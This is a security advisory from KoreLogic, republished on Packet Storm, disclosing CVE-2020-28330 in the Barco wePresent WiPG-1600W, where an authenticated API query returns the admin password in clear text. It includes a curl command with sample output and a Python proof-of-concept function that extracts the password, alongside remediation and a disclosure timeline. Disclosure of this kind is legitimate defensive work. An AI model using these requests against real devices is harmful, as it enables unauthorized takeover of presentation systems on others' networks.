Barco wePresent Admin Credential Exposure

2020-11-20T00:00:00
ID PACKETSTORM:160160
Type packetstorm
Reporter Jim Becher
Modified 2020-11-20T00:00:00

Description

                                        
                                            `KL-001-2020-005 : Barco wePresent Admin Credentials Exposed In Plain-text  
  
Title: Barco wePresent Admin Credentials Exposed In Plain-text  
Advisory ID: KL-001-2020-005  
Publication Date: 2020.11.20  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-005.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Barco  
Affected Product: wePresent WiPG-1600W  
Affected Version: 2.5.1.8  
Platform: Embedded Linux  
CWE Classification: CWE-523: Unprotected Transport of Credentials  
CVE ID: CVE-2020-28330  
  
  
2. Vulnerability Description  
  
An attacker armed with hardcoded API credentials from  
KL-001-2020-004 (CVE-2020-28329) can issue an authenticated  
query to display the admin password for the main web user  
interface listening on port 443/tcp.  
  
  
3. Technical Description  
  
An authenticated request using the hardcoded credentials in  
KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0  
will display the current admin password in clear text. An  
attacker will now have the admin password on the device, and  
can use the web interface to make any configuration changes  
to the device using the web UI.  
  
$ curl -k -u 'admin:[REDACTED]'  
https://192.168.2.200:4001/w1.0 { "status": 200, "message":  
"Get successful", "data": { "key": "/w1.0", "value": {  
"ClientAccess":{  
"EnableAirplay": true  
}, "Configuration":{  
"RestartSystem": false, "ShutdownSystem": false,  
"SetAction": "NoAction", "SetActionUrl": ""  
}, "DeviceInfo":{  
"ArticleNumber": "Barco_Number",  
"CurrentUptime": 58524, "InUse": false,  
"ModelName": "WiPG-1600", "Sharing": false,  
"Status": 0, "StatusMessage": "", "TotalUptime":  
473871262, "TotalUsers": 0, "LoginCodeOption":  
"Random", "LoginCode": "3746", "SystemPassword":  
"W3Pr3s3nt", <- Admin password  
... ...  
  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released an updated firmware (2.5.3.12) which  
remediates the described vulnerability. Firmware and release  
notes are available at:  
  
https://www.barco.com/en/support/software/R33050104  
  
  
5. Credit  
  
This vulnerability was discovered by Jim Becher (@jimbecher) of  
KoreLogic, Inc.  
  
  
6. Disclosure Timeline  
  
2020.08.24 - KoreLogic submits vulnerability details to  
Barco.  
2020.08.25 - Barco acknowledges receipt and the intention  
to investigate.  
2020.09.21 - Barco notifies KoreLogic that this issue,  
along with several others reported by KoreLogic,  
will require more than the standard 45 business  
day remediation timeline. Barco requests to delay  
coordinated disclosure until 2020.12.11.  
2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.  
2020.09.25 - Barco informs KoreLogic of their intent to acquire  
CVE number for this vulnerability.  
2020.11.09 - Barco shares CVE number with KoreLogic and announces  
their intention to release the updated firmware  
ahead of schedule, on 2020.11.11. Request that KoreLogic  
delay public disclosure until 2020.11.20.  
2020.11.11 - Barco firmware release.  
2020.11.20 - KoreLogic public disclosure.  
  
  
7. Proof of Concept  
  
The following is a basic Python function to return the admin password:  
  
def get_admin_pw(host, port, adminpw):  
apiuser = "admin"  
apipw = "[REDACTED]"  
url = "https://" + host + ":" + port + "/w1.0"  
response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3)  
dict = response.json()  
adminpw = dict['data']['value']['DeviceInfo']['SystemPassword']  
return adminpw  
  
  
The contents of this advisory are copyright(c) 2020  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt  
`